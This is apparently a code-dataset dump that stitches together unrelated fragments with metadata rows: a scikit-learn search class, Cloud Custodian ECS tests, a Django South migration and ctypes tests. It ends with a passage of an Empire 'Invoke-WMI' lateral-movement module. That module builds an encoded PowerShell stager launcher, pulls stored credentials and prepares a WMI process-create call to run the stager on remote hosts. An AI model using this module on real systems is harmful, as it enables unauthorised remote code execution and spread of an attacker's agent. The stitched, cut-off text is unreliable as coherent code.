def __init__(self, estimator, param_distributions, n_iter=10, scoring=None,
fit_params=None, n_jobs=1, iid=True, refit=True, cv=None,
verbose=0, pre_dispatch='2*n_jobs', random_state=None,
error_score='raise'):
self.param_distributions = param_distributions
self.n_iter = n_iter
self.random_state = random_state
super(RandomizedSearchCV, self).__init__(
estimator=estimator, scoring=scoring, fit_params=fit_params,
n_jobs=n_jobs, iid=iid, refit=refit, cv=cv, verbose=verbose,
pre_dispatch=pre_dispatch, error_score=error_score)
def fit(self, X, y=None):
"""Run fit on the estimator with randomly drawn parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
            Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_output], optional
Target relative to X for classification or regression;
None for unsupervised learning.
"""
sampled_params = ParameterSampler(self.param_distributions,
self.n_iter,
random_state=self.random_state)
return self._fit(X, y, sampled_params)
| bsd-3-clause | -4,600,771,839,748,933,000 | 37.342289 | 87 | 0.608943 | false |
alfredgamulo/cloud-custodian | tests/test_ecs.py | 1 | 18797 | # Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from .common import BaseTest
import fnmatch
import os
import time
from c7n.exceptions import PolicyExecutionError
class TestEcsService(BaseTest):
def test_ecs_cluster_tag_augment(self):
session_factory = self.replay_flight_data(
'test_ecs_cluster_tag_augment')
p = self.load_policy({
'name': 'ctags', 'resource': 'ecs',
'filters': [{'tag:Data': 'Magic'}]},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(
resources[0]['Tags'],
[{'Key': 'Env', 'Value': 'Dev'},
{'Key': 'Data', 'Value': 'Magic'}])
def test_ecs_service_config(self):
session_factory = self.replay_flight_data(
'test_ecs_service_config')
p = self.load_policy({
'name': 'ctags', 'resource': 'ecs-service', 'source': 'config'},
session_factory=session_factory)
resources = p.run()
assert len(resources) == 1
assert resources[0]['name'] == 'queue-processor'
assert resources[0]['clusterArn'].endswith('cluster/dev')
def test_ecs_service_tag_augment(self):
session_factory = self.replay_flight_data(
'test_ecs_service_tag_augment')
p = self.load_policy({
'name': 'ctags', 'resource': 'ecs-service'},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(
resources[0]['Tags'],
[{'Key': 'Name', 'Value': 'Dev'}])
def test_ecs_service_by_arn(self):
session_factory = self.replay_flight_data('test_ecs_service_by_arn')
p = self.load_policy({
'name': 'ecs-svc', 'resource': 'ecs-service'},
session_factory=session_factory)
svcs = p.resource_manager.get_resources(
["arn:aws:ecs:us-east-1:644160558196:service/test/test-no-delete"])
self.assertEqual(len(svcs), 1)
self.assertEqual(
{t['Key']: t['Value'] for t in svcs[0]['Tags']},
{'Env': 'Dev', 'Owner': '1'})
self.assertRaises(
PolicyExecutionError,
p.resource_manager.get_resources,
["arn:aws:ecs:us-east-1:644160558196:service/test-no-delete"])
def test_ecs_service_resource(self):
session_factory = self.replay_flight_data("test_ecs_service")
p = self.load_policy(
{"name": "all-ecs", "resource": "ecs-service"},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]["serviceName"], "home-web")
def test_ecs_service_metrics(self):
session_factory = self.replay_flight_data("test_ecs_service_metrics")
p = self.load_policy(
{
"name": "all-ecs",
"resource": "ecs-service",
"filters": [
{"serviceName": "home-web"},
{
"type": "metrics",
"name": "MemoryUtilization",
"op": "less-than",
"value": 1,
},
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertTrue("c7n.metrics" in resources[0])
def test_ecs_service_update(self):
session_factory = self.replay_flight_data("test_ecs_service_update")
test_service_name = 'custodian-service-update-test'
p = self.load_policy(
{
"name": "all-ecs-to-update",
"resource": "ecs-service",
"filters": [
{"networkConfiguration.awsvpcConfiguration.assignPublicIp": "ENABLED"},
{"serviceName": test_service_name}
],
"actions": [
{
'type': 'modify',
'update': {
'networkConfiguration': {
'awsvpcConfiguration': {
'assignPublicIp': 'DISABLED',
}
},
}
}
],
},
session_factory=session_factory,
)
result = p.run()
self.assertEqual(len(result), 1)
client = session_factory().client("ecs")
svc_current = client.describe_services(
cluster="arn:aws:ecs:us-east-1:644160558196:cluster/test-cluster",
services=[test_service_name]
)["services"][0]
self.assertEqual(svc_current['networkConfiguration'][
'awsvpcConfiguration']['assignPublicIp'], 'DISABLED')
def test_ecs_service_delete(self):
session_factory = self.replay_flight_data("test_ecs_service_delete")
p = self.load_policy(
{
"name": "all-ecs",
"resource": "ecs-service",
"filters": [{"serviceName": "web"}],
"actions": ["delete"],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
svc = resources.pop()
self.assertEqual(svc["serviceName"], "web")
if self.recording:
time.sleep(1)
client = session_factory().client("ecs")
svc_current = client.describe_services(
cluster=svc["clusterArn"], services=[svc["serviceName"]]
)[
"services"
][
0
]
self.assertEqual(svc_current["serviceArn"], svc["serviceArn"])
self.assertNotEqual(svc_current["status"], svc["status"])
def test_ecs_service_task_def_filter(self):
session_factory = self.replay_flight_data("test_ecs_task_def_filter")
p = self.load_policy(
{
"name": "services-using-nginx",
"resource": "ecs-service",
"filters": [
{
"type": "task-definition",
"key": "containerDefinitions[].image",
"op": "in",
"value_type": "swap",
"value": "nginx:latest",
}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]["serviceName"], "home-web")
def test_ecs_service_taggable(self):
services = [
{"serviceArn": "arn:aws:ecs:us-east-1:644160558196:service/test/test-yes-tag",
"serviceName": "test-yes-tag",
"clusterArn": "arn:aws:ecs:us-east-1:644160558196:cluster/test"},
{"serviceArn": "arn:aws:ecs:us-east-1:644160558196:service/test-no-tag",
"serviceName": "test-no-tag",
"clusterArn": "arn:aws:ecs:us-east-1:644160558196:cluster/test"}]
p = self.load_policy({
"name": "ecs-service-taggable",
"resource": "ecs-service",
"filters": [
{"type": "taggable", "state": True}]})
resources = p.resource_manager.filter_resources(services)
self.assertEqual(len(resources), 1)
self.assertTrue(resources[0]['serviceName'], 'test-yes-tag')
def test_ecs_service_subnet(self):
session_factory = self.replay_flight_data("test_ecs_service_subnet")
p = self.load_policy(
{
"name": "ecs-service-subnets",
"resource": "ecs-service",
"filters": [
{
"type": "subnet",
"key": "tag:Name",
"value": "implied"
}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]["serviceName"], "c7n-test")
class TestEcsTaskDefinition(BaseTest):
def test_task_definition_resource(self):
session_factory = self.replay_flight_data("test_ecs_task_def")
p = self.load_policy(
{"name": "task-defs", "resource": "ecs-task-definition"},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 3)
images = set()
for r in resources:
for c in r["containerDefinitions"]:
images.add(c["image"])
self.assertEqual(
sorted(images), ["nginx:latest", "postgres:latest", "redis:latest"]
)
def test_task_definition_delete(self):
session_factory = self.replay_flight_data("test_ecs_task_def_delete")
p = self.load_policy(
{
"name": "task-defs",
"resource": "ecs-task-definition",
"filters": [{"family": "launch-me"}],
"actions": ["delete"],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(
resources[0]["containerDefinitions"][0]["image"], "postgres:latest"
)
self.assertEqual(resources[0]["status"], "ACTIVE")
arns = session_factory().client("ecs").list_task_definitions(
familyPrefix="launch-me", status="ACTIVE"
).get(
"taskDefinitionArns"
)
self.assertEqual(arns, [])
def test_task_definition_get_resources(self):
session_factory = self.replay_flight_data("test_ecs_task_def_query")
p = self.load_policy(
{"name": "task-defs", "resource": "ecs-task-definition"},
session_factory=session_factory,
)
arn = "arn:aws:ecs:us-east-1:644160558196:task-definition/ecs-read-only-root:1"
resources = p.resource_manager.get_source('describe').get_resources([arn])
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]["taskDefinitionArn"], arn)
self.assertEqual(
len(
fnmatch.filter(
os.listdir(
os.path.join(self.placebo_dir, "test_ecs_task_def_query")
),
"*.json",
)
),
1,
)
def test_ecs_task_def_tags(self):
session_factory = self.replay_flight_data(
"test_ecs_task_def_tags"
)
arn = "arn:aws:ecs:us-east-1:644160558196:task-definition/c7n:1"
p = self.load_policy(
{
"name": "tag-ecs-task-def",
"resource": "ecs-task-definition",
"filters": [
{"taskDefinitionArn": arn},
{"tag:Role": "present"}
],
"actions": [
{"type": "tag", "key": "TestKey", "value": "TestValue"},
{"type": "tag", "key": "c7n-tag", "value": "present"},
{"type": "remove-tag", "tags": ["Role"]}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
client = session_factory().client("ecs")
tags = {t['key']: t['value'] for t in
client.list_tags_for_resource(
resourceArn=resources[0]["taskDefinitionArn"]).get("tags")}
self.assertEqual(tags, {"TestKey": "TestValue", "c7n-tag": "present"})
def test_ecs_task_def_config(self):
session_factory = self.replay_flight_data("test_ecs_task_def_config")
p = self.load_policy(
{
"name": "ecs-task-def-config-tag",
"resource": "ecs-task-definition",
"source": "config",
"filters": [
{"tag:test": "name"}
],
"actions": [
{"type": "remove-tag", "tags": ["test"]}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
assert resources[0]['containerDefinitions'] == [
{'command': ['/bin/sh -c "echo \'<html> <head> '
'<title>Amazon ECS Sample App</title> '
'<style>body {margin-top: 40px; '
'background-color: #333;} </style> '
'</head><body> <div '
'style=color:white;text-align:center> '
'<h1>Amazon ECS Sample App</h1> '
'<h2>Congratulations!</h2> <p>Your '
'application is now running on a '
'container in Amazon ECS.</p> '
"</div></body></html>' > "
'/usr/local/apache2/htdocs/index.html '
'&& httpd-foreground"'],
'cpu': 0,
'entryPoint': ['sh', '-c'],
'essential': True,
'image': 'httpd:2.4',
'mountPoints': [],
'name': 'fargate-app-2',
'portMappings': [{'containerPort': 80,
'hostPort': 80,
'protocol': 'tcp'}],
'volumesFrom': []}]
assert resources[0]['Tags'] == [{'Key': 'test', 'Value': 'name'}]
client = session_factory().client("ecs")
self.assertEqual(len(client.list_tags_for_resource(
resourceArn=resources[0]["taskDefinitionArn"]).get("tags")), 0)
class TestEcsTask(BaseTest):
def test_task_by_arn(self):
session_factory = self.replay_flight_data('test_ecs_task_by_arn')
p = self.load_policy({
'name': 'tasks', 'resource': 'ecs-task'}, session_factory=session_factory)
tasks = p.resource_manager.get_resources([
'arn:aws:ecs:us-east-1:644160558196:task/devx/21b23041dec947b996fcc7a8aa606d64'])
self.assertEqual(len(tasks), 1)
self.assertEqual(tasks[0]['launchType'], 'FARGATE')
self.assertEqual(tasks[0]['lastStatus'], 'STOPPED')
self.assertRaises(
PolicyExecutionError,
p.resource_manager.get_resources,
['arn:aws:ecs:us-east-1:644160558196:task/21b23041dec947b996fcc7a8aa606d64'])
def test_task_resource(self):
session_factory = self.replay_flight_data("test_ecs_task")
p = self.load_policy(
{"name": "tasks", "resource": "ecs-task"}, session_factory=session_factory
)
resources = p.run()
self.assertEqual(len(resources), 4)
def test_ecs_task_subnet(self):
session_factory = self.replay_flight_data("test_ecs_task_subnet")
p = self.load_policy(
{
"name": "ecs-task-fargate-subnets",
"resource": "ecs-task",
"filters": [
{
"type": "subnet",
"key": "tag:Name",
"value": "implied"
}
],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0].get('attachments')[0].get(
'details')[0].get('value'), "subnet-05b58b4afe5124322")
def test_task_delete(self):
session_factory = self.replay_flight_data("test_ecs_task_delete")
p = self.load_policy(
{
"name": "tasks",
"resource": "ecs-task",
"filters": [{"group": "service:home-web"}, {"startedBy": "present"}],
"actions": ["stop"],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 2)
client = session_factory().client("ecs")
tasks = client.list_tasks(cluster=resources[0]["clusterArn"])["taskArns"]
self.assertFalse({r["taskArn"] for r in resources}.intersection(tasks))
class TestEcsContainerInstance(BaseTest):
def test_container_instance_resource(self):
session_factory = self.replay_flight_data("test_ecs_container_instance")
p = self.load_policy(
{"name": "container-instances", "resource": "ecs-container-instance"},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
def test_container_instance_update_agent(self):
session_factory = self.replay_flight_data(
"test_ecs_container_instance_update_agent"
)
p = self.load_policy(
{
"name": "container-instance-update-agent",
"resource": "ecs-container-instance",
"actions": [{"type": "update-agent"}],
},
session_factory=session_factory,
)
resources = p.run()
if self.recording:
time.sleep(60)
client = session_factory().client("ecs")
updated_version = client.describe_container_instances(
cluster="default",
containerInstances=["a8a469ef-009f-40f8-9639-3a0d9c6a9b9e"],
)[
"containerInstances"
][
0
][
"versionInfo"
][
"agentVersion"
]
self.assertNotEqual(
updated_version, resources[0]["versionInfo"]["agentVersion"]
)
def test_container_instance_set_state(self):
session_factory = self.replay_flight_data(
"test_ecs_container_instance_set_state"
)
p = self.load_policy(
{
"name": "container-instance-update-agent",
"resource": "ecs-container-instance",
"actions": [{"type": "set-state", "state": "DRAINING"}],
},
session_factory=session_factory,
)
resources = p.run()
client = session_factory().client("ecs")
state = client.describe_container_instances(
cluster="default", containerInstances=[resources[0]["containerInstanceArn"]]
)[
"containerInstances"
][
0
][
"status"
]
self.assertEqual(state, "DRAINING")
| apache-2.0 | -6,050,890,175,432,686,000 | 36.669339 | 93 | 0.503644 | false |
justinpotts/mozillians | mozillians/users/migrations/0048_auto__add_unique_externalaccount_identifier_type_user.py | 3 | 12132 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding unique constraint on 'ExternalAccount', fields ['identifier', 'type', 'user']
db.create_unique('users_externalaccount', ['identifier', 'type', 'user_id'])
def backwards(self, orm):
# Removing unique constraint on 'ExternalAccount', fields ['identifier', 'type', 'user']
db.delete_unique('users_externalaccount', ['identifier', 'type', 'user_id'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'groups.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group'},
'always_auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'irc_channel': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '63', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'steward': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.UserProfile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'system': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'url': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'wiki': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'})
},
'groups.language': {
'Meta': {'ordering': "['name']", 'object_name': 'Language'},
'always_auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'url': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'})
},
'groups.skill': {
'Meta': {'ordering': "['name']", 'object_name': 'Skill'},
'always_auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'url': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'})
},
'users.externalaccount': {
'Meta': {'ordering': "['type']", 'unique_together': "(('identifier', 'type', 'user'),)", 'object_name': 'ExternalAccount'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'privacy': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.UserProfile']"})
},
'users.usernameblacklist': {
'Meta': {'ordering': "['value']", 'object_name': 'UsernameBlacklist'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_regex': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'users.userprofile': {
'Meta': {'ordering': "['full_name']", 'object_name': 'UserProfile', 'db_table': "'profile'"},
'allows_community_sites': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'allows_mozilla_sites': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'basket_token': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'bio': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50'}),
'date_mozillian': ('django.db.models.fields.DateField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'date_vouched': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'members'", 'blank': 'True', 'to': "orm['groups.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ircname': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '63', 'blank': 'True'}),
'is_vouched': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'languages': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'members'", 'blank': 'True', 'to': "orm['groups.Language']"}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'photo': ('sorl.thumbnail.fields.ImageField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'privacy_bio': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_city': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_country': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_date_mozillian': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_email': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_full_name': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_groups': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_ircname': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_languages': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_photo': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_region': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_skills': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_timezone': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_title': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'privacy_tshirt': ('mozillians.users.models.PrivacyField', [], {'default': '1'}),
'privacy_vouched_by': ('mozillians.users.models.PrivacyField', [], {'default': '3'}),
'region': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'skills': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'members'", 'blank': 'True', 'to': "orm['groups.Skill']"}),
'timezone': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '70', 'blank': 'True'}),
'tshirt': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'vouched_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'vouchees'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['users.UserProfile']", 'blank': 'True', 'null': 'True'})
}
}
complete_apps = ['users'] | bsd-3-clause | 6,401,244,330,422,055,000 | 82.675862 | 226 | 0.552258 | false |
Suwmlee/XX-Net | Python3/lib/ctypes/test/test_funcptr.py | 3 | 4038 | import os, unittest
from ctypes import *
try:
WINFUNCTYPE
except NameError:
# fake to enable this test on Linux
WINFUNCTYPE = CFUNCTYPE
import _ctypes_test
lib = CDLL(_ctypes_test.__file__)
class CFuncPtrTestCase(unittest.TestCase):
def test_basic(self):
X = WINFUNCTYPE(c_int, c_int, c_int)
def func(*args):
return len(args)
x = X(func)
self.assertEqual(x.restype, c_int)
self.assertEqual(x.argtypes, (c_int, c_int))
self.assertEqual(sizeof(x), sizeof(c_voidp))
self.assertEqual(sizeof(X), sizeof(c_voidp))
def test_first(self):
StdCallback = WINFUNCTYPE(c_int, c_int, c_int)
CdeclCallback = CFUNCTYPE(c_int, c_int, c_int)
def func(a, b):
return a + b
s = StdCallback(func)
c = CdeclCallback(func)
self.assertEqual(s(1, 2), 3)
self.assertEqual(c(1, 2), 3)
# The following no longer raises a TypeError - it is now
# possible, as in C, to call cdecl functions with more parameters.
#self.assertRaises(TypeError, c, 1, 2, 3)
self.assertEqual(c(1, 2, 3, 4, 5, 6), 3)
if not WINFUNCTYPE is CFUNCTYPE and os.name != "ce":
self.assertRaises(TypeError, s, 1, 2, 3)
def test_structures(self):
WNDPROC = WINFUNCTYPE(c_long, c_int, c_int, c_int, c_int)
def wndproc(hwnd, msg, wParam, lParam):
return hwnd + msg + wParam + lParam
HINSTANCE = c_int
HICON = c_int
HCURSOR = c_int
LPCTSTR = c_char_p
class WNDCLASS(Structure):
_fields_ = [("style", c_uint),
("lpfnWndProc", WNDPROC),
("cbClsExtra", c_int),
("cbWndExtra", c_int),
("hInstance", HINSTANCE),
("hIcon", HICON),
("hCursor", HCURSOR),
("lpszMenuName", LPCTSTR),
("lpszClassName", LPCTSTR)]
wndclass = WNDCLASS()
wndclass.lpfnWndProc = WNDPROC(wndproc)
WNDPROC_2 = WINFUNCTYPE(c_long, c_int, c_int, c_int, c_int)
# This is no longer true, now that WINFUNCTYPE caches created types internally.
## # CFuncPtr subclasses are compared by identity, so this raises a TypeError:
## self.assertRaises(TypeError, setattr, wndclass,
## "lpfnWndProc", WNDPROC_2(wndproc))
# instead:
self.assertIs(WNDPROC, WNDPROC_2)
# 'wndclass.lpfnWndProc' leaks 94 references. Why?
self.assertEqual(wndclass.lpfnWndProc(1, 2, 3, 4), 10)
f = wndclass.lpfnWndProc
del wndclass
del wndproc
self.assertEqual(f(10, 11, 12, 13), 46)
def test_dllfunctions(self):
def NoNullHandle(value):
if not value:
raise WinError()
return value
strchr = lib.my_strchr
strchr.restype = c_char_p
strchr.argtypes = (c_char_p, c_char)
self.assertEqual(strchr(b"abcdefghi", b"b"), b"bcdefghi")
self.assertEqual(strchr(b"abcdefghi", b"x"), None)
strtok = lib.my_strtok
strtok.restype = c_char_p
# Neither of this does work: strtok changes the buffer it is passed
## strtok.argtypes = (c_char_p, c_char_p)
## strtok.argtypes = (c_string, c_char_p)
def c_string(init):
size = len(init) + 1
return (c_char*size)(*init)
s = b"a\nb\nc"
b = c_string(s)
## b = (c_char * (len(s)+1))()
## b.value = s
## b = c_string(s)
self.assertEqual(strtok(b, b"\n"), b"a")
self.assertEqual(strtok(None, b"\n"), b"b")
self.assertEqual(strtok(None, b"\n"), b"c")
self.assertEqual(strtok(None, b"\n"), None)
if __name__ == '__main__':
unittest.main()
| bsd-2-clause | -297,175,993,570,968,400 | 29.795276 | 87 | 0.528479 | false |
frohoff/Empire | lib/modules/powershell/lateral_movement/invoke_wmi.py | 2 | 5792 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-WMI',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using WMI.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'CredID' : {
'Description' : 'CredID from the store to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : '[domain\]username to use to execute command.',
'Required' : False,
'Value' : ''
},
'Password' : {
'Description' : 'Password to use to execute command.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
userName = self.options['UserName']['Value']
password = self.options['Password']['Value']
script = """$null = Invoke-WmiMethod -Path Win32_process -Name create"""
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
if domainName != "":
self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
else:
self.options["UserName"]['Value'] = str(userName)
if password != "":
self.options["Password"]['Value'] = password
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
return ""
else:
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
# build the WMI execution string
computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
script += " -ComputerName @("+computerNames+")"
